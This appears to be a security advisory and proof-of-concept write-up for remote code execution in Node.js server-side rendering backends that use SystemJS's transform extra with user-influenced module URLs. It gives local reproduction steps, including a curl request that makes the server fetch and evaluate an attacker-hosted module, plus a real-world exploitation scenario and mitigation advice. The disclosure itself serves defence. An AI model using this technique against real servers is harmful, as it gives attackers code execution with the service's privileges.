# Attack Scenario Notes

## Summary

An application that enables SystemJS `dist/extras/transform.js` in a backend
server-side rendering workflow can execute attacker-controlled JavaScript in the
Node.js process if the server imports a module URL influenced by a remote user.

The transform extra overrides `System.instantiate()` for non-WASM modules,
fetches the resolved URL, passes the response text through `loader.transform()`,
and evaluates the returned source with indirect `eval`.

## Affected Pattern

The vulnerable application pattern is:

1. Backend Node.js app uses SystemJS for SSR component loading.
2. Backend enables `dist/extras/transform.js`.
3. A remote user can influence the URL passed to `System.import()`.
4. The URL points to JavaScript controlled by the attacker.

In that configuration, the attacker's module is fetched and evaluated inside the
server process.

## Local Reproduction

Install dependencies:

```bash
npm install
```

Start attacker-controlled module host:

```bash
npm run attacker
```

Start vulnerable SSR backend:

```bash
npm run ssr
```

Trigger server-side import of the attacker module:

```bash
curl 'http://127.0.0.1:8080/render?component=http://127.0.0.1:9001/payload.js?run=1'
```

Expected result:

```text
/tmp/pwned
/tmp/pwned/systemjs-ssr-rce.txt
```

Use a fresh run= value for repeated tests after deleting the proof directory; SystemJS caches imported modules by URL.

The proof file /tmp/pwned/systemjs-ssr-rce.txt contains:

```text
ssr payload executed in backend node process
```

## Wild Exploitation Scenario

In a real deployment, the SSR server could expose an endpoint that renders a
plugin, theme, widget, micro-frontend, or component by URL. If that URL is
supplied by a tenant, CMS author, preview link, request parameter, database
field, or import map entry, an attacker can host a System.register payload and
cause the backend to import it during SSR.

Because evaluation happens in the backend Node.js context, the impact is code
execution with the privileges of the SSR service account. The local PoC uses a
directory creation and file write only to demonstrate impact safely.

## Mitigation

Do not use `dist/extras/transform.js` for untrusted or remotely influenced
module URLs. Server-side code should only import modules from trusted,
allowlisted origins or local paths. Treat remote SSR component URLs and dynamic
import-map entries as code execution surfaces.